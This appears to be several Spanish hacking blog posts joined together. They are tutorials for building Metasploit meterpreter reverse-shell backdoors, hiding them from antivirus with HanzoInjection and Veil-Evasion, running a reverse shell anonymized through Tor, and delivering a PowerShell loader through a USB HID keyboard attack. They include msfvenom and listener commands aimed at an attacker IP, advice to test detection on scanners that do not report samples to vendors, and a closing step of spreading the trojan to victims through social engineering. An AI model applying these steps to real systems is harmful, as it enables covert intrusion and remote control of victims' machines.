Buenas noches hackers! En esta entrada con un vídeo explicativo de Rabbit Hutch, se procederá a la creación de payloads y el uso del exploit/multi/handler para estar a la escucha de por un puerto determinado a la espera de una conexión inversa a nuestro host, dentro de una red LAN proporcionada por VMware y en un entorno controlado virtualizado.
SET, proporciona un gran abanico de posibilidades en cuanto a ataques de ingeniería social. Estas herramientas se integran con el framework Metasploit para así garantizar una fase de explotación en el sistema víctima.
La creación de un payload ejecutable garantiza que ese binario malicioso mediante la ingeniería social, la víctima pueda ejecutarlo y así realizar la conexión hacia nuestro host y la obtención de meterpreter para uso de administración remota del sistema.
Este payload generado no es FUD, por tanto existen métodos de ofuscación de código ya sea una vez compilado, o desde su código fuente. Para ello esta entrada y este vídeo es un mera introducción a malware, detectado por los diferentes AV's existentes en el mercado. Dentro de poco veremos herramientas que generan troyanos o RAT, completamente FUD o casi.
Pero básicamente el procedimiento es el mismo. La elección de un payload y su correspondiente exploit. Herramientas como Veil-Evasion permiten la creación de payloads y poder usarlo con el exploit/multi/handler de Metasploit a la espera de la conexión (o payload) inversa dada una dirección IP pública o privada y un puerto determinado.
También veremos más adelante de forma teórica ataques fuera de la red LAN mediante el uso de NoIP y apertura de puertos en la puerta de enlace o gateway.
En la entrada de hoy explicaré la PoC realizada por Belane. El fin principal es la conexión inversa de un backdoor de forma anonima a traves de Tor, en otras palabras, una shell reversa anonimizada.
La PoC esta realizada en un entorno virtualizado compuesto de maquinas virtuales con el fin educativo de un proceso real.
Parte 1:
La primera parte del video se muestra como se realiza la conexión ssh al servidor remoto donde esta alojado las imagenes de docker usando nc.
"Docker (Wikipedia): Docker es un proyecto de código abierto que automatiza el despliegue de aplicaciones dentro de contenedores de software, proporcionando una capa adicional de abstracción y automatización de Virtualización a nivel de sistema operativo en Linux. Docker utiliza características de aislamiento de recursos del kernel de Linux, tales como cgroups y espacios de nombres (namespaces)
para permitir que "contenedores" independientes se ejecuten dentro de
una sola instancia de Linux, evitando la sobrecarga de iniciar y
mantener máquinas virtuales."
Estas imagenes son como maquinas virtuales que se despliegan como contenedores. Primero se usa tor-base, que es una imagen con el servicio tor instalado. Y después donkeykong que es una imagen preparada para metasploit.
Se aprecia como lista las imagenes de docker y luego lanza la imagen con:
docker run -it --name tor-service tor-base /bin/bash
Al ejecutarse se muestra una nueva shell de la maquina y se configura Tor.
Se ejecuta desde el shell, tor & en background para poder seguir usando esa shell. Visualiza el nombre de dominio proporcionado por Tor (hostname) y ejecuta el nc para estar a la escucha de las posibles conexiones inversas.
Desde la maquina virtual de la victima (Windows 7) se instala Tor, socat y nc.
Inicia Tor en background con start /b tor y ejecuta socat.exe. Socat es como una navaja suiza de conexiones, permite redirigir de un punto a otro, hacer tuberias. En este caso se usa para crear un proxy y resolver el dominio .onion. Crea una tuberia desde el puerto 5555 en localhost al 3333 en el dominio que nos da tor .onion, usando el proxy en 9050 (tor).
Y finalmente la victima ejecuta el nc para establecer la conexión con el atacante, devolviendonos una shell.
Parte2:
En esta parte se utilizara un HID attack para infectar un ordenador con el backdoor conectandose a Tor, de esta forma el panel de control del atacante no esta expuesto, en este caso Metasploit.
De igual modo se usa docker para listar la imagenes disponibles en el servidor remoto, llamada donkeykong y se lanza la imagen:
docker run -it donkeykong /bin/bash
Al ejecutarse se muestra una shell y se configura Tor.
Se ejecuta desde el shell, tor & en background para poder seguir usando esa shell. Una vez realizado este procedimiento abrimos la consola de Metasploit con msfconsole y usamos el exploit/multi/handler con el payload windows/meterpreter/reverse_tcp a la escucha de conexiones.
Se abre otra terminal para generar el backdoor malicioso con msfvenom
En el escritorio de la maquina Kali Linux, tenemos el backdoor y el archivo loader.ps1 que será el usado en el HID attack.
En este caso el atacante usa la maquina Kali Linux como servidor propio donde aloja el backdoor y el loader.ps1 mediante la creación de un webserver en el directorio actual.
Ahora conectando nuestro telefono movil NetHunter a la maquina (Windows 8.1) realiza el HID attack simulando que es un teclado y ejecutando una serie de ordenes, abriendo un powershell y descargando el fichero loader.ps1 infectando a la maquina.
De este modo obtendremos una sesión meterpreter.
Una vez explicado el procedimiento de la PoC, os muestro el video demostrativo:
P.D El autor y desarrollador de esta PoC, no se hace responsable del mal uso de este tutorial. Hacerlo siempre en un entorno virtualizado con VMware, simulando este proceso real.
En el día de hoy, os traigo una nueva prueba de concepto muy interesante. Lo que haremos será generar un backdoor 100% indetectable para los antivirus, con la ayuda de HanzoInjection. Para los que no saben que es un backdoor (puerta trasera), se puede definir como una secuencia de código que evita los sistemas de seguridad, permitiendo a un atacante acceder al sistema de forma remota. Las puertas traseras pueden ser utilizadas para fines maliciosos y de espionaje. NOTA: Antes de comenzar, saber que vamos a utilizar una máquina en Kali-Linux y otra Windows. PASO 1:
Lo primero que haremos será crear un simple backdoor con la herramienta msfvenom. Como ya sabemos, este backdoor es detectable por algunos antivirus, por lo tanto no será completamente útil a la hora de realizar un ataque. Con este comando, lo que haremos será utilizar:
Payload meterpreter con conexión inversa.
Lhost= 192.168.1.53 (IP del atacante).
Lport=4444 (Puerto por el que establecemos la escucha).
evil.bin = Fichero binario creado (en carpeta root/Escritorio).
Introducimos el siguiente comando en la consola: > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.53 lport=4444 -t raw -o /root/Escritorio/evil.bin
PASO 2:
En este punto, lo analizaremos con cualquier escaner online (excepto virustotal), en nuestro caso hemos utilizado: www.nodistribute.com , (otra buena opción es www.metascan-online.com ).
Podemos observar que el backdoor es detectado por 2/35 antivirus, no es mucho, pero queremos que sea 100% indetectable.
PASO 3:
Ya tenemos nuestro fichero binario (evil.bin) , lo llevaremos a una máquina WINDOWS.
Únicamente debemos acceder a la carpeta donde se encuentra el ejecutable (teniendo el fichero evil.bin en la misma ruta) y ejecutar el siguiente comando:
> HanzoInjection.exe -p evil.bin -o evilInject.cs
Así creamos un archivo de código (.cs) que podrá ser convertido a (.exe).
PASO 4:
Lo siguiente que haremos será volver a Kali-Linux y crear un proyecto con monodevelop.
Esta herramienta nos permite transformar el código (.cs) en un archivo ejecutable (.exe).
Primero instalamos monodevelop:
>apt-get install monodevelop
Creamos un proyecto nuevo con el nombre que queramos, en nuestro caso se ha llamado EvilProyect:
Ahora deberemos compilar o construir el código, pero nos dará el siguiente error:
Para quitarlo accedemos a Proyecto -> Opciones de EvilProyect y seleccionamos la opción "Permitir código inseguro":
Un nuevo error relacionado con las librerias xml aparecerá. Para quitarlo iremos a Referencias -> Editar Referencias y añadiremos la libreria System.xml:
Compilamos el código correctamente y se habrá creado en la carpeta del proyecto nuestro ejecutable (EvilProyect.exe):
PASO 5:
Volvemos a escanear el archivo (EvilProyect.exe) y vemos ha quedado completamente limpio (100% Indetectable!!):
PASO 6:
Por último, utilizando la herramienta metasploit en Kali-Linux y establecemos una conexión a la escucha utilizando el exploit multi/handler y el payload windows/meterpreter/reverse_tcp porsupuesto utilizando el mismo puerto/ip que usamos para la creación del backdoor.
En
este punto, solo quedará propagar nuestro troyano y esperar a que la
víctima lo ejecute. Automáticamente conseguiremos
una sesión de meterpreter (shell) como vimos en anteriores post.
Espero
que les haya gustado el post, y como decimos siempre, la prueba de
concepto se ha realizado sobre máquinas virtualizadas y para fines
educativos, no nos hacemos responsables de su mal uso. "Es extraña la ligereza con la que los malvados creen que todo les saldrá bien"- Victor Hugo
Buenas tardes hackers! En esta prueba de concepto realizada en un entorno virtualizado, se conseguirá una sesión meterpreter a través de un exploit(multi/handler) y la vulnerabilidad crítica basada en la persona con un windows 7. Para ello se usara una herramienta llamada Veil-Framework, donde generaremos un payload que tiene como objetivo ejecutarse en la máquina víctima para realizar la acción maliciosa y bastante indetectable por la mayoría de los antivirus. Instalamos la herramienta en Kali clonando desde github.
Una vez tengamos la carpeta de Veil entramos y ejecutamos /Install.sh. Recomiendo la lectura en github de los pasos y las condiciones que se han de cumplir antes de instalar la herramienta, para que no exista ningún tipo error.
Una vez instalado nos situamos en la carpeta Veil-Evasion y ejecutamos previamente dando los permisos necesarios para la ejecución. Existen 49 payloads. El comando a usar es ./Veil-Evasion.py.
Podemos apreciar los distintos payload que existen, dependiendo del entorno en el que se ejecuten.
Configuramos uno de los payload más interesantes, llamado meterpreter con conexión inversa. El atacante lanzara el exploit y permanecerá a la escucha de conexiones hasta que la víctima ejecute el código malicioso y el payload se conectara a la dirección IP asociado a un puerto determinado. IP--->172.16.22.133 (atacante) Puerto--->4444 (atacante) De esta forma ya tendríamos configurado nuestro payload que enviaremos a través de ingeniería social a nuestra víctima.
El archivo que genera es un .bat (backdor.bat) en la carpeta veil-output. Para que la victima pueda ejecutarlo sera necesario convertirlo en un .exe. Existen muchos programas para hacerlo, en esta PoC se usa el Bat To Exe Converter v2.4.
Una vez convertido el .exe lo analizamos con www.scan4you.net y nos da un resultado de detecciones de antivirus por firmas de 5/35, no esta nada mal. Ahora ya creado una parte importante y fundamental que es la conexión, necesitamos abrir Metasploit (msfconsole) que será la parte que actuara como si de un servidor se tratase a la escucha de conexiones. Ejecutamos el comando msfconsole, y usamos el exploit multi/handler que servirá con el fin de que la víctima ejecute el archivo y el payload realice la conexión inversa al atacante, dándole acceso a la maquina. Una vez obtenido la sesión meterpreter, la maquina victima esta comprometida donde se puede realizar acciones de todo tipo, ya sea una linea de comandos como un keylogger.
P.D No me hago responsable del mal uso que se le de a esta PoC, es de carácter educativo y esta realizado en un entorno virtualizado. No seáis malos!!
